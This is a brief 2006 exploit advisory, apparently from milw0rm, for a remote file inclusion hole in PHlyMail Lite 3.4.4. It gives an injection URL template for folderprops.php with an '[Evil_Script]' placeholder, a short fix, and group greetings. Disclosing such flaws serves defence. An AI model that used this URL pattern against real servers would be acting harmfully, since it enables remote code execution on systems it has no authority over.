---------------------------------------------------------------------------
PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability [2]
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : PHlyMail Lite
version : v. 3.4.4 (Build 3.04.04)
URL : http://phlymail.de/
------------------------------------------------------------------
Exploit:
~~~~~~~
Variable $_PM_[path][handler] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
# http://www.site.com/[path]/handlers/email/folderprops.php?_PM_[path][handler]=[Evil_Script]
---------------------------------------------------------------------------
Solution :
~~~~~~~~~
declare variabel $_PM_[path][handler]
---------------------------------------------------------------------------
Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------
*/
Contact:
~~~~~~~
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
_/*
-------------------------------- [ EOF] ----------------------------------
# milw0rm.com [2006-08-21]